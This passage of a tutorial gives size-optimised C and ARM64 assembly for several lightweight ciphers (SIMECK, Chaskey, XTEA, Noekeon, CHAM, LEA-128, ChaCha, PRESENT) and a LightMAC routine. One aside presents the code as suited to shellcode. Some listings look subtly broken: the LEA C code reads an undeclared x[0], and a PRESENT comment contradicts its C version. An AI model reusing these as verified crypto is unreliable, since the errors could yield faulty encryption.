A block cipher designed by Gangqiang Yang, Bo Zhu, Valentin Suder, Mark D. Aagaard, and Guang Gong was published in 2015. According to the authors, SIMECK combines the good design components of both SIMON and SPECK, in order to devise more compact and efficient block ciphers.

#define R(v,n)(((v)<<(n))|((v)>>(32-(n))))
#define X(a,b)(t)=(a),(a)=(b),(b)=(t)

void simeck(void*mk,void*p){
  unsigned int t,k0,k1,k2,k3,l,r,*k=mk,*x=p;
  unsigned long long s=0x938BCA3083F;

  k0=*k;k1=k[1];k2=k[2];k3=k[3]; 
  r=*x;l=x[1];

  do{
    r^=R(l,1)^(R(l,5)&l)^k0;
    X(l,r);
    t=(s&1)-4;
    k0^=R(k1,1)^(R(k1,5)&k1)^t;    
    X(k0,k1);X(k1,k2);X(k2,k3);
  } while(s>>=1);
  *x=r; x[1]=l;
}

I cannot say if SIMECK is more compact than SIMON in hardware. However, SPECK is clearly more compact in software.

  
// SIMECK in ARM64 assembly
// 100 bytes

    .arch armv8-a
    .text
    .global simeck

simeck:
     // unsigned long long s = 0x938BCA3083F;
     movz    x2, 0x083F
     movk    x2, 0xBCA3, lsl 16
     movk    x2, 0x0938, lsl 32

     // load 128-bit key 
     ldp     w3, w4, [x0]
     ldp     w5, w6, [x0, 8]

     // load 64-bit plaintext 
     ldp     w8, w7, [x1]
L0:
     // r ^= R(l,1) ^ (R(l,5) & l) ^ k0;
     eor     w9, w3, w7, ror 31
     and     w10, w7, w7, ror 27
     eor     w9, w9, w10
     mov     w10, w7
     eor     w7, w8, w9
     mov     w8, w10

     // t1 = (s & 1) - 4;
     // k0 ^= R(k1,1) ^ (R(k1,5) & k1) ^ t1;
     // X(k0,k1); X(k1,k2); X(k2,k3);
     eor     w3, w3, w4, ror 31
     and     w9, w4, w4, ror 27
     eor     w9, w9, w3
     mov     w3, w4
     mov     w4, w5
     mov     w5, w6
     and     x10, x2, 1
     sub     x10, x10, 4
     eor     w6, w9, w10

     // s >>= 1
     lsr     x2, x2, 1
     cbnz    x2, L0

     // save 64-bit ciphertext 
     stp     w8, w7, [x1]
     ret

7.8 CHASKEY

A block cipher designed by Nicky Mouha, Bart Mennink, Anthony Van Herrewege, Dai Watanabe, Bart Preneel and Ingrid Verbauwhede. Although Chaskey is specifically a MAC function, the underlying primitive is a block cipher. What you see below is only encryption, however, it is possible to implement an inverse function for decryption by reversing the function using rol and sub in place of ror and add.

Chaskey: An Efficient MAC Algorithm for 32-bit Microcontrollers

#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
#define F(n)for(i=0;i<n;i++)
  
void chaskey(void*mk,void*p){
  unsigned int i,*x=p,*k=mk;

  F(4)x[i]^=k[i];
  F(16)
    *x+=x[1],
    x[1]=R(x[1],27)^*x,
    x[2]+=x[3],
    x[3]=R(x[3],24)^x[2],
    x[2]+=x[1],
    *x=R(*x,16)+x[3],
    x[3]=R(x[3],19)^*x,
    x[1]=R(x[1],25)^x[2],
    x[2]=R(x[2],16);
  F(4)x[i]^=k[i];
}
  
// CHASKEY in ARM64 assembly
// 112 bytes

  .arch armv8-a
  .text

  .global chaskey

  // chaskey(void*mk, void*data);
chaskey:
    // load 128-bit key
    ldp    w2, w3, [x0]
    ldp    w4, w5, [x0, 8]

    // load 128-bit plain text
    ldp    w6, w7, [x1]
    ldp    w8, w9, [x1, 8]

    // xor plaintext with key
    eor    w6, w6, w2          // x[0] ^= k[0];
    eor    w7, w7, w3          // x[1] ^= k[1];
    eor    w8, w8, w4          // x[2] ^= k[2];
    eor    w9, w9, w5          // x[3] ^= k[3];
    mov    w10, 16             // i = 16
L0:
    add    w6, w6, w7          // x[0] += x[1];
    eor    w7, w6, w7, ror 27  // x[1]=R(x[1],27) ^ x[0];
    add    w8, w8, w9          // x[2] += x[3];
    eor    w9, w8, w9, ror 24  // x[3]=R(x[3],24) ^ x[2];
    add    w8, w8, w7          // x[2] += x[1];
    ror    w6, w6, 16
    add    w6, w9, w6          // x[0]=R(x[0],16) + x[3];
    eor    w9, w6, w9, ror 19  // x[3]=R(x[3],19) ^ x[0];
    eor    w7, w8, w7, ror 25  // x[1]=R(x[1],25) ^ x[2];
    ror    w8, w8, 16          // x[2]=R(x[2],16);
    subs   w10, w10, 1         // i--
    bne    L0                  // i > 0

    // xor cipher text with key
    eor    w6, w6, w2          // x[0] ^= k[0];
    eor    w7, w7, w3          // x[1] ^= k[1];
    eor    w8, w8, w4          // x[2] ^= k[2];
    eor    w9, w9, w5          // x[3] ^= k[3];

    // save 128-bit cipher text
    stp    w6, w7, [x1]
    stp    w8, w9, [x1, 8]
    ret

7.9 XTEA

A block cipher designed by Roger Needham and David Wheeler. It was published in 1998 as a response to weaknesses found in the Tiny Encryption Algorithm (TEA). XTEA compared to its predecessor TEA contains a more complex key-schedule and rearrangement of shifts, XORs, and additions. The implementation here uses 32 rounds.

Tea Extensions

void xtea(void*mk,void*p){
  unsigned int t,r=65,s=0,*k=mk,*x=p;

  while(--r)
    t=x[1],
    x[1]=*x+=((((t<<4)^(t>>5))+t)^
    (s+k[((r&1)?s+=0x9E3779B9,
    s>>11:s)&3])),*x=t;
}

Although the round counter r is initialized to 65, it is only performing 32 rounds of encryption. If 64 rounds were required, then r should be initialized to 129 (64*2+1). Perhaps it would make more sense to allow a number of rounds as a parameter, but this is simply for illustration.

  
// XTEA in ARM64 assembly
// 92 bytes

    .arch armv8-a
    .text

    .equ ROUNDS, 32

    .global xtea

    // xtea(void*mk, void*data);
xtea:
    mov    w7, ROUNDS * 2

    // load 64-bit plain text
    ldp    w2, w4, [x1]         // x0  = x[0], x1 = x[1];
    mov    w3, wzr              // sum = 0;
    ldr    w5, =0x9E3779B9      // c   = 0x9E3779B9;
L0:
    mov    w6, w3               // t0 = sum;
    tbz    w7, 0, L1            // if ((i & 1)==0) goto L1;

    // the next 2 only execute if (i % 2) is not zero
    add    w3, w3, w5           // sum += 0x9E3779B9;
    lsr    w6, w3, 11           // t0 = sum >> 11
L1:
    and    w6, w6, 3            // t0 %= 4
    ldr    w6, [x0, x6, lsl 2]  // t0 = k[t0];
    add    w8, w3, w6           // t1 = sum + t0
    mov    w6, w4, lsl 4        // t0 = (x1 << 4)
    eor    w6, w6, w4, lsr 5    // t0^= (x1 >> 5)
    add    w6, w6, w4           // t0+= x1
    eor    w6, w6, w8           // t0^= t1
    mov    w8, w4               // backup x1
    add    w4, w6, w2           // x1 = t0 + x0

    // XCHG(x0, x1)
    mov    w2, w8               // x0 = x1
    subs   w7, w7, 1
    bne    L0                   // i > 0
    stp    w2, w4, [x1]
    ret

7.10 NOEKEON

A block cipher designed by Joan Daemen, Michaël Peeters, Gilles Van Assche and Vincent Rijmen.

Noekeon website

#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))

void noekeon(void*mk,void*p){
  unsigned int a,b,c,d,t,*k=mk,*x=p;
  unsigned char rc=128;

  a=*x;b=x[1];c=x[2];d=x[3];

  for(;;) {
    a^=rc;t=a^c;t^=R(t,8)^R(t,24);
    b^=t;d^=t;a^=k[0];b^=k[1];
    c^=k[2];d^=k[3];t=b^d;
    t^=R(t,8)^R(t,24);a^=t;c^=t;
    if(rc==212)break;
    rc=((rc<<1)^((rc>>7)*27));
    b=R(b,31);c=R(c,27);d=R(d,30);
    b^=~((d)|(c));t=d;d=a^c&b;a=t;
    c^=a^b^d;b^=~((d)|(c));a^=c&b;
    b=R(b,1);c=R(c,5);d=R(d,2);
  }
  *x=a;x[1]=b;x[2]=c;x[3]=d;
}

NOEKEON can be implemented quite well for both INTEL and ARM architectures.

  
// NOEKEON in ARM64 assembly
// 212 bytes

    .arch armv8-a
    .text

    .global noekeon

noekeon:
    mov    x12, x1

    // load 128-bit key
    ldp    w4, w5, [x0]
    ldp    w6, w7, [x0, 8]

    // load 128-bit plain text
    ldp    w2, w3, [x1, 8]
    ldp    w0, w1, [x1]

    // c = 128
    mov    w8, 128
    mov    w9, 27
L0:
    // a^=rc;t=a^c;t^=R(t,8)^R(t,24);
    eor    w0, w0, w8
    eor    w10, w0, w2
    eor    w11, w10, w10, ror 8
    eor    w10, w11, w10, ror 24

    // b^=t;d^=t;a^=k[0];b^=k[1];
    eor    w1, w1, w10
    eor    w3, w3, w10
    eor    w0, w0, w4
    eor    w1, w1, w5

    // c^=k[2];d^=k[3];t=b^d;
    eor    w2, w2, w6
    eor    w3, w3, w7
    eor    w10, w1, w3

    // t^=R(t,8)^R(t,24);a^=t;c^=t;
    eor    w11, w10, w10, ror 8
    eor    w10, w11, w10, ror 24
    eor    w0, w0, w10
    eor    w2, w2, w10

    // if(rc==212)break;
    cmp    w8, 212
    beq    L1

    // rc=((rc<<1)^((rc>>7)*27));
    lsr    w10, w8, 7
    mul    w10, w10, w9
    eor    w8, w10, w8, lsl 1
    uxtb   w8, w8

    // b=R(b,31);c=R(c,27);d=R(d,30);
    ror    w1, w1, 31
    ror    w2, w2, 27
    ror    w3, w3, 30

    // b^=~(d|c);t=d;d=a^(c&b);a=t;
    orr    w10, w3, w2
    eon    w1, w1, w10
    mov    w10, w3
    and    w3, w2, w1
    eor    w3, w3, w0
    mov    w0, w10

    // c^=a^b^d;b^=~(d|c);a^=c&b;
    eor    w2, w2, w0
    eor    w2, w2, w1
    eor    w2, w2, w3
    orr    w10, w3, w2
    eon    w1, w1, w10
    and    w10, w2, w1
    eor    w0, w0, w10

    // b=R(b,1);c=R(c,5);d=R(d,2);
    ror    w1, w1, 1
    ror    w2, w2, 5
    ror    w3, w3, 2
    b      L0
L1:
    // *x=a;x[1]=b;x[2]=c;x[3]=d;
    stp    w0, w1, [x12]
    stp    w2, w3, [x12, 8]
    ret

7.11 CHAM

A block cipher designed by Bonwook Koo, Dongyoung Roh, Hyeonjin Kim, Younghoon Jung, Dong-Geon Lee, and Daesung Kwon.

CHAM: A Family of Lightweight Block Ciphers for Resource-Constrained Devices.

#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
#define F(n)for(i=0;i<n;i++)
typedef unsigned int W;

void cham(void*mk,void*p){
  W rk[8],*w=p,*k=mk,i,t;

  F(4)
    t=k[i]^R(k[i],31),
    rk[i]=t^R(k[i],24),
    rk[(i+4)^1]=t^R(k[i],21);
  F(80)
    t=w[3],w[0]^=i,w[3]=rk[i&7],
    w[3]^=R(w[1],(i&1)?24:31),
    w[3]+=w[0],
    w[3]=R(w[3],(i&1)?31:24),
    w[0]=w[1],w[1]=w[2],w[2]=t;
}

This algorithm works better for 32-bit ARM where conditional execution of all instructions is supported.

  
// CHAM 128/128 in ARM64 assembly
// 160 bytes 

    .arch armv8-a
    .text
    .global cham

    // cham(void*mk,void*p);
cham:
    sub    sp, sp, 32
    mov    w2, wzr
    mov    x8, x1
L0:
    // t=k[i]^R(k[i],31),
    ldr    w5, [x0, x2, lsl 2]
    eor    w6, w5, w5, ror 31

    // rk[i]=t^R(k[i],24),
    eor    w7, w6, w5, ror 24
    str    w7, [sp, x2, lsl 2]

    // rk[(i+4)^1]=t^R(k[i],21);
    eor    w7, w6, w5, ror 21
    add    w5, w2, 4
    eor    w5, w5, 1
    str    w7, [sp, x5, lsl 2]

    // i++
    add    w2, w2, 1
    // i < 4
    cmp    w2, 4
    bne    L0

    ldp    w0, w1, [x8]
    ldp    w2, w3, [x8, 8]

    // i = 0
    mov    w4, wzr
L1:
    tst    w4, 1

    // t=w[3],w[0]^=i,w[3]=rk[i%8],
    mov    w5, w3
    eor    w0, w0, w4
    and    w6, w4, 7
    ldr    w3, [sp, x6, lsl 2]

    // w[3]^=R(w[1],(i & 1) ? 24 : 31),
    mov    w6, w1, ror 24
    mov    w7, w1, ror 31
    csel   w6, w6, w7, ne
    eor    w3, w3, w6

    // w[3]+=w[0],
    add    w3, w3, w0

    // w[3]=R(w[3],(i & 1) ? 31 : 24),
    mov    w6, w3, ror 31
    mov    w7, w3, ror 24
    csel   w3, w6, w7, ne

    // w[0]=w[1],w[1]=w[2],w[2]=t;
    mov    w0, w1
    mov    w1, w2
    mov    w2, w5

    // i++ 
    add    w4, w4, 1
    // i < 80
    cmp    w4, 80
    bne    L1

    stp    w0, w1, [x8]
    stp    w2, w3, [x8, 8]
    add    sp, sp, 32
    ret

7.12 LEA-128

A block cipher designed by Deukjo Hong, Jung-Keun Lee, Dong-Chan Kim, Daesung Kwon, Kwon Ho Ryu, and Dong-Geon Lee.

LEA: A 128-Bit Block Cipher for Fast Encryption on Common Processors

#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
typedef unsigned int W;

void lea128(void*mk,void*p){
  W r,t,*w=p,*k=mk;
  W c[4]=
    {0xc3efe9db,0x88c4d604,
     0xe789f229,0xc6f98763};

  for(r=0;r<24;r++){
    t=c[r%4];
    c[r%4]=R(t,28);
    k[0]=R(k[0]+t,31);
    k[1]=R(k[1]+R(t,31),29);
    k[2]=R(k[2]+R(t,30),26);
    k[3]=R(k[3]+R(t,29),21);      
    t=x[0];
    w[0]=R((w[0]^k[0])+(w[1]^k[1]),23);
    w[1]=R((w[1]^k[2])+(w[2]^k[1]),5);
    w[2]=R((w[2]^k[3])+(w[3]^k[1]),3);
    w[3]=t;
  }
}

Everything here is very straight forward. All Add, Rotate, Xor operations.

// LEA-128/128 in ARM64 assembly
// 224 bytes

    .arch armv8-a

    // include the MOVL macro
    .include "../../include.inc"

    .text
    .global lea128

lea128:
    mov    x11, x0
    mov    x12, x1

    // allocate 16 bytes
    sub    sp, sp, 4*4

    // load immediate values
    movl   w0, 0xc3efe9db
    movl   w1, 0x88c4d604
    movl   w2, 0xe789f229
    movl   w3, 0xc6f98763

    // store on stack
    str    w0, [sp    ]
    str    w1, [sp,  4]
    str    w2, [sp,  8]
    str    w3, [sp, 12]

    // for(r=0;r<24;r++) {
    mov    w8, wzr

    // load 128-bit key
    ldp    w4, w5, [x11]
    ldp    w6, w7, [x11, 8]

    // load 128-bit plaintext
    ldp    w0, w1, [x12]
    ldp    w2, w3, [x12, 8]
L0:
    // t=c[r%4];
    and    w9, w8, 3
    ldr    w10, [sp, x9, lsl 2]

    // c[r%4]=R(t,28);
    mov    w11, w10, ror 28
    str    w11, [sp, x9, lsl 2]

    // k[0]=R(k[0]+t,31);
    add    w4, w4, w10
    ror    w4, w4, 31

    // k[1]=R(k[1]+R(t,31),29);
    ror    w11, w10, 31
    add    w5, w5, w11
    ror    w5, w5, 29

    // k[2]=R(k[2]+R(t,30),26);
    ror    w11, w10, 30
    add    w6, w6, w11
    ror    w6, w6, 26

    // k[3]=R(k[3]+R(t,29),21);
    ror    w11, w10, 29
    add    w7, w7, w11
    ror    w7, w7, 21

    // t=x[0];
    mov    w10, w0

    // w[0]=R((w[0]^k[0])+(w[1]^k[1]),23);
    eor    w0, w0, w4
    eor    w9, w1, w5
    add    w0, w0, w9
    ror    w0, w0, 23

    // w[1]=R((w[1]^k[2])+(w[2]^k[1]),5);
    eor    w1, w1, w6
    eor    w9, w2, w5
    add    w1, w1, w9
    ror    w1, w1, 5

    // w[2]=R((w[2]^k[3])+(w[3]^k[1]),3);
    eor    w2, w2, w7
    eor    w3, w3, w5
    add    w2, w2, w3
    ror    w2, w2, 3

    // w[3]=t;
    mov    w3, w10

    // r++
    add    w8, w8, 1
    // r < 24
    cmp    w8, 24
    bne    L0

    // save 128-bit ciphertext
    stp    w0, w1, [x12]
    stp    w2, w3, [x12, 8]

    add    sp, sp, 4*4
    ret

7.13 CHACHA

A stream cipher designed by Daniel Bernstein and published in 2008. This along with Poly1305 for authentication has become a drop in replacement on handheld devices for AES-128-GCM where AES native instructions are unavailable. The version implemented here is based on a description provided in RFC8439 that uses a 256-bit key, a 32-bit counter and 96-bit nonce.

The ChaCha family of stream ciphers.

ChaCha20 and Poly1305 for IETF Protocols

#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
#define F(n)for(i=0;i<n;i++)
#define X(a,b)(t)=(a),(a)=(b),(b)=(t)
typedef unsigned int W;

void P(W*s,W*x){
    W a,b,c,d,i,t,r;
    W v[8]={0xC840,0xD951,0xEA62,0xFB73,
            0xFA50,0xCB61,0xD872,0xE943};
            
    F(16)x[i]=s[i];
    
    F(80) {
      d=v[i%8];
      a=(d&15);b=(d>>4&15);
      c=(d>>8&15);d>>=12;
      
      for(r=0x19181410;r;r>>=8)
        x[a]+=x[b],
        x[d]=R(x[d]^x[a],(r&255)),
        X(a,c),X(b,d);
    }
    F(16)x[i]+=s[i];
    s[12]++;
}
void chacha(W l,void*in,void*state){
    unsigned char c[64],*p=in;
    W i,r,*s=state,*k=in;

    if(l) {
      while(l) {
        P(s,(W*)c);
        r=(l>64)?64:l;
        F(r)*p++^=c[i];
        l-=r;
      }
    } else {
      s[0]=0x61707865;s[1]=0x3320646E;
      s[2]=0x79622D32;s[3]=0x6B206574;
      F(12)s[i+4]=k[i];
    }
}

The permutation function makes use of the UBFX instruction.

// ChaCha in ARM64 assembly 
// 348 bytes

 .arch armv8-a
 .text
 .global chacha

 .include "../../include.inc"

P:
    adr     x13, cc_v

    // F(16)x[i]=s[i];
    mov     x8, 0
P0:
    ldr     w14, [x2, x8, lsl 2]
    str     w14, [x3, x8, lsl 2]

    add     x8, x8, 1
    cmp     x8, 16
    bne     P0

    mov     x8, 0
P1:
    // d=v[i%8];
    and     w12, w8, 7
    ldrh    w12, [x13, x12, lsl 1]

    // a=(d&15);b=(d>>4&15);
    // c=(d>>8&15);d>>=12;
    ubfx    w4, w12, 0, 4
    ubfx    w5, w12, 4, 4
    ubfx    w6, w12, 8, 4
    ubfx    w7, w12, 12, 4

    movl    w10, 0x19181410
P2:
    // x[a]+=x[b],
    ldr     w11, [x3, x4, lsl 2]
    ldr     w12, [x3, x5, lsl 2]
    add     w11, w11, w12
    str     w11, [x3, x4, lsl 2]

    // x[d]=R(x[d]^x[a],(r&255)),
    ldr     w12, [x3, x7, lsl 2]
    eor     w12, w12, w11
    and     w14, w10, 255
    ror     w12, w12, w14
    str     w12, [x3, x7, lsl 2]

    // X(a,c),X(b,d);
    stp     w4, w6, [sp, -16]!
    ldp     w6, w4, [sp], 16
    stp     w5, w7, [sp, -16]!
    ldp     w7, w5, [sp], 16

    // r >>= 8
    lsr    w10, w10, 8
    cbnz   w10, P2

    // i++
    add    x8, x8, 1
    // i < 80
    cmp    x8, 80
    bne    P1

    // F(16)x[i]+=s[i];
    mov    x8, 0
P3:
    ldr    w11, [x2, x8, lsl 2]
    ldr    w12, [x3, x8, lsl 2]
    add    w11, w11, w12
    str    w11, [x3, x8, lsl 2]

    add    x8, x8, 1
    cmp    x8, 16
    bne    P3

    // s[12]++;
    ldr    w11, [x2, 12*4]
    add    w11, w11, 1
    str    w11, [x2, 12*4]
    ret
cc_v:
    .2byte 0xC840, 0xD951, 0xEA62, 0xFB73
    .2byte 0xFA50, 0xCB61, 0xD872, 0xE943

    // void chacha(int l, void *in, void *state);
chacha:
    str    x30, [sp, -96]!
    cbz    x0, L2

    add    x3, sp, 16

    mov    x9, 64
L0:
    // P(s,(W*)c);
    bl     P

    // r=(l > 64) ? 64 : l;
    cmp    x0, 64
    csel   x10, x0, x9, ls

    // F(r)*p++^=c[i];
    mov    x8, 0
L1:
    ldrb   w11, [x3, x8]
    ldrb   w12, [x1]
    eor    w11, w11, w12
    strb   w11, [x1], 1

    add    x8, x8, 1
    cmp    x8, x10
    bne    L1

    // l-=r;
    subs   x0, x0, x10
    bne    L0
    beq    L4
L2:
    // s[0]=0x61707865;s[1]=0x3320646E;
    movl   w11, 0x61707865
    movl   w12, 0x3320646E
    stp    w11, w12, [x2]

    // s[2]=0x79622D32;s[3]=0x6B206574;
    movl   w11, 0x79622D32
    movl   w12, 0x6B206574
    stp    w11, w12, [x2, 8]

    // F(12)s[i+4]=k[i];
    mov    x8, 16
    sub    x1, x1, 16
L3:
    ldr    w11, [x1, x8]
    str    w11, [x2, x8]
    add    x8, x8, 4
    cmp    x8, 64
    bne    L3
L4:
    ldr    x30, [sp], 96
    ret

7.14 PRESENT

A block cipher specifically designed for hardware and published in 2007. Why implement a hardware cipher? PRESENT is a 64-bit block cipher that can be implemented reasonably well on any 64-bit architecture. Although the data and key are byte swapped before being processed using the REV instruction, stripping this should not affect security of the cipher.

PRESENT: An Ultra-Lightweight Block Cipher

#define R(v,n)(((v)>>(n))|((v)<<(64-(n))))
#define F(a,b)for(a=0;a<b;a++)

typedef unsigned long long W;
typedef unsigned char B;

B sbox[16] =
  {0xc,0x5,0x6,0xb,0x9,0x0,0xa,0xd,
   0x3,0xe,0xf,0x8,0x4,0x7,0x1,0x2 };

B S(B x) {
  return (sbox[(x&0xF0)>>4]<<4)|sbox[(x&0x0F)];
}

#define rev __builtin_bswap64

void present(void*mk,void*data) {
    W i,j,r,p,t,t2,k0,k1,*k=(W*)mk,*x=(W*)data;
    
    k0=rev(k[0]); k1=rev(k[1]);t=rev(x[0]);
  
    F(i,32-1) {
      p=t^k0;
      F(j,8)((B*)&p)[j]=S(((B*)&p)[j]);
      t=0;r=0x0030002000100000;
      F(j,64)
        t|=((p>>j)&1)<<(r&255),
        r=R(r+1,16);
      p =(k0<<61)|(k1>>3);
      k1=(k1<<61)|(k0>>3);
      p=R(p,56);
      ((B*)&p)[0]=S(((B*)&p)[0]);
      k0=R(p,8)^((i+1)>>2);
      k1^=(((i+1)& 3)<<62);
    }
    x[0] = rev(t^k0);
}

The sbox lookup routine (S) uses UBFX and BFI/BFXIL in place of LSR,LSL,AND and ORR. The source requires preprocessing with cpp -E before assembly.

// PRESENT in ARM64 assembly
// 224 bytes

    .arch armv8-a
    .text
    .global present

    #define k  x0
    #define x  x1
    #define r  w2
    #define p  x3
    #define t  x4
    #define k0 x5
    #define k1 x6
    #define i  x7
    #define j  x8
    #define s  x9

present:
    str     lr, [sp, -16]!

    // k0=k[0];k1=k[1];t=x[0];
    ldp     k0, k1, [k]
    ldr     t, [x]

    // only dinosaurs use big endian convention
    rev     k0, k0
    rev     k1, k1
    rev     t, t

    mov     i, 0
    adr     s, sbox
L0:
    // p=t^k0;
    eor     p, t, k0

    // F(j,8)((B*)&p)[j]=S(((B*)&p)[j]);
    mov     j, 8
L1:
    bl      S
    ror     p, p, 8
    subs    j, j, 1
    bne     L1

    // t=0;r=0x0030002000100000;
    mov     t, 0
    ldr     r, =0x30201000
    // F(j,64)
    mov     j, 0
L2:
    // t|=((p>>j)&1)<<(r&255),
    lsr     x10, p, j         // x10 = (p >> j) & 1
    and     x10, x10, 1       // 
    lsl     x10, x10, x2      // x10 << r
    orr     t, t, x10         // t |= x10

    // r=R(r+1,16);
    add     r, r, 1           // r = R(r+1, 8)
    ror     r, r, 8

    add     j, j, 1           // j++
    cmp     j, 64             // j < 64
    bne     L2

    // p =(k0<<61)|(k1>>3);
    lsr     p, k1, 3
    orr     p, p, k0, lsl 61

    // k1=(k1<<61)|(k0>>3);
    lsr     k0, k0, 3
    orr     k1, k0, k1, lsl 61

    // p=R(p,56);
    ror     p, p, 56
    bl      S

    // i++
    add     i, i, 1

    // k0=R(p,8)^((i+1)>>2);
    lsr     x10, i, 2
    eor     k0, x10, p, ror 8

    // k1^= (((i+1)&3)<<62);
    and     x10, i, 3
    eor     k1, k1, x10, lsl 62

    // i < 31
    cmp     i, 31
    bne     L0

    // x[0] = t ^= k0
    eor     p, t, k0
    rev     p, p
    str     p, [x]

    ldr     lr, [sp], 16
    ret

S:
    ubfx    x10, p, 0, 4              // x10 = (p & 0x0F)
    ubfx    x11, p, 4, 4              // x11 = (p & 0xF0) >> 4

    ldrb    w10, [s, w10, uxtw 0]     // w10 = s[w10]
    ldrb    w11, [s, w11, uxtw 0]     // w11 = s[w11]

    bfi     p, x10, 0, 4              // p[0] = ((x11 << 4) | x10)
    bfi     p, x11, 4, 4

    ret
sbox:
    .byte 0xc, 0x5, 0x6, 0xb, 0x9, 0x0, 0xa, 0xd
    .byte 0x3, 0xe, 0xf, 0x8, 0x4, 0x7, 0x1, 0x2

7.15 LIGHTMAC

A Message Authentication Code using block ciphers. Designed by Atul Luykx, Bart Preneel, Elmar Tischhauser, and Kan Yasuda. The version shown here only supports ciphers with a 64-bit block size and 128-bit key. E is defined as a block cipher. For this code, one could use XTEA, SPECK-64/128 or PRESENT. If BLK_LEN and TAG_LEN are changed to 16, it will support 128-bit ciphers like AES-128, CHASKEY, CHAM-128/128, SPECK-128/256, LEA-128, NOEKEON. Based on the parameters used here, the largest message length can be 1,792 bytes. For a shellcode trasmitting small packets, this should be sufficient.

A MAC Mode for Lightweight Block Ciphers

To improve upon the parameters used for 64-bit block ciphers, read the following paper.

Blockcipher-based MACs: Beyond the Birthday Bound without Message Length

#define CTR_LEN     1 // 8-bits
#define BLK_LEN     8 // 64-bits
#define TAG_LEN     8 // 64-bits
#define BC_KEY_LEN 16 // 128-bits

#define M_LEN         BLK_LEN-CTR_LEN

void present(void*mk,void*data);
#define E present

#define F(a,b)for(a=0;a<b;a++)
typedef unsigned int W;
typedef unsigned char B;

// max message for current parameters is 1792 bytes
void lm(B*b,W l,B*k,B*t) {
    int i,j,s;
    B   m[BLK_LEN];

    // initialize tag T
    F(i,TAG_LEN)t[i]=0;

    for(s=1,j=0; l>=M_LEN; s++,l-=M_LEN) {
      // add 8-bit counter S 
      m[0] = s;
      // add bytes to M 
      F(j,M_LEN)
        m[CTR_LEN+j]=*b++;
      // encrypt M with K1
      E(k,m);
      // update T
      F(i,TAG_LEN)t[i]^=m[i];
    }
    // copy remainder of input
    F(i,l)m[i]=b[i];
    // add end bit
    m[i]=0x80;
    // update T 
    F(i,l+1)t[i]^=m[i];
    // encrypt T with K2
    k+=BC_KEY_LEN;
    E(k,t);
}

No assembly for this right now, but feel free to have a go!

8. Summary

ARM expects their “Deimos” design scheduled for 2019 and “Hercules” for 2020 to outperform any laptop class CPU from Intel. The A76 does not support A32 or T32, and it’s highly likely the next designs won’t either. The ARM64 instruction set is almost perfect. The only minor thing that annoys me is how the x30 register (Link Register) must be saved across calls to subroutines. There’s also no rotate left or modulus instructions that would be useful.

All code shown here can be found in this github repo.